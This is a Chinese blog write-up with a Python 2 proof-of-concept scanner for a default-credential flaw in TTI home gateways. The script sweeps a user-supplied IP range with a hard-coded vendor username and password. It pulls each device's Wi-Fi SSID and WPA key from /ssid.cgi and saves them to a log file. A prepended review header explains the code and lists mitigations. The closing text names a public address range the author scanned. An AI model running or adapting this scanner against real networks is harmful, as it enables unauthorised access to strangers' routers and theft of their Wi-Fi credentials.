这个漏洞主要是设备存在默认口令的问题：我这里用 Python 模拟 401（HTTP Basic）登录认证后再请求对应的页面，就可以获取到 Wi-Fi 的 SSID 和密码。下面是脚本的代码，很简单。
# NOTE(review): Proof-of-concept scanner from a write-up about a home-gateway
# default-credential exposure. It reads a start/end IP from the user, expands
# the range (ip2num/num2ip/ip_range), and a pool of worker threads sized by the
# 'Thread:' prompt (bThread, tThread) calls checkTTI for every host. checkTTI
# requests /ssid.cgi on port 80 with a fixed HTTP Basic username/password
# hard-coded in the function, pulls the SSID and the WPA PSK out of the returned
# HTML with two regexes, prints them and writes them to TTI_KEY.log (opened with
# 'w+') in the working directory. Network and parse errors are swallowed by the
# bare except clauses in tThread.run and checkTTI, so an unreachable or
# non-matching host is silently skipped.
# Defender's view: the weakness is a vendor-wide default management credential
# combined with a WAN-reachable HTTP page that renders the Wi-Fi PSK in plain
# text. Mitigations are per-device unique credentials enforced at first login,
# binding the management interface to the LAN side (or filtering the management
# port at the WAN edge), and never returning the PSK in page content. A burst of
# Basic-Auth GETs for /ssid.cgi across consecutive addresses from one source is
# the pattern to alert on.
# Extraction note: the listing below is collapsed onto a single line by the
# page extraction and is left byte-identical; review comments are confined to
# this header.
#!/usr/bin/env python # coding=utf-8 # code by 92ez.com # last modify time 2015-08-08 09:59 import Queue from threading import Thread import time import re import os import subprocess import urllib2 #ip to num def ip2num(ip): ip = [int(x) for x in ip.split('.')] return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3] #num to ip def num2ip(num): return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24, (num & 0x00ff0000) >> 16, (num & 0x0000ff00) >> 8, num & 0x000000ff) #get all ips list between start ip and end ip def ip_range(start, end): return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff] #main function def bThread(iplist): SETTHREAD = raw_input('Thread: ') print '[Note] Running.../n' threadl = [] queue = Queue.Queue() hosts = iplist for host in hosts: queue.put(host) threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))] for t in threadl: t.start() for t in threadl: t.join() #create thread class tThread(Thread): def __init__(self, queue): Thread.__init__(self) self.queue = queue def run(self): global PORT while not self.queue.empty(): host = self.queue.get() try: #print host checkTTI(host,PORT) except: continue def checkTTI(host,port): aimurl = "http://"+host+":"+port+"/ssid.cgi" username = 'login' password = 'gzcatvnet' auth = urllib2.HTTPBasicAuthHandler() auth.add_password('', aimurl, username, password) opener = urllib2.build_opener(auth, urllib2.CacheFTPHandler) urllib2.install_opener(opener) try: data = urllib2.urlopen(aimurl,timeout = 5) htmlcontent = data.read() data.close() resssid = re.findall(r'<input id=/"tmp_ssidid/" value=/"(.+?)/" size=/"16/" maxlength=/"16/">',htmlcontent) reskey = re.findall(r'<input name=/"wl_wpa_psk/" value=/"(.+?)/" size=/"32/" maxlength=/"32/" type=/"password/" >',htmlcontent) #print log print host +" SSID: CandyTime_"+resssid[0].encode('utf8')+ ' KEY: '+reskey[0].encode('utf8') #write to log file try: LOGFILE.write(host +" SSID: CandyTime_"+resssid[0].encode('utf8')+ ' KEY: 
'+reskey[0].encode('utf8')+'/n') LOGFILE.flush() finally: LOGFILE.flush() except: pass if __name__ == '__main__': print '/n########### Hunt the TTI Home Gateway ##########/n' print ' Author 92ez.com' print ' Last modify 2015-08-08 09:59/n' print '################################################/n' # global PORT PORT = '80' global LOGFILE LOGFILE = open(os.path.abspath('.')+'/TTI_KEY.log', 'w+') startIp = raw_input('Start IP: ') endIp = raw_input('End IP: ') iplist = ip_range(startIp, endIp) print '/n[Note] Will scan '+str(len(iplist))+" host.../n" bThread(iplist)
当然，可扫描的网段可能比较有限，因为这类设备一般都有地域性，各省使用的设备可能不同。博主这里测试的网段是 119.32.2.* 到 119.36.1.1。扫描完成后，结果会自动保存到文本文件。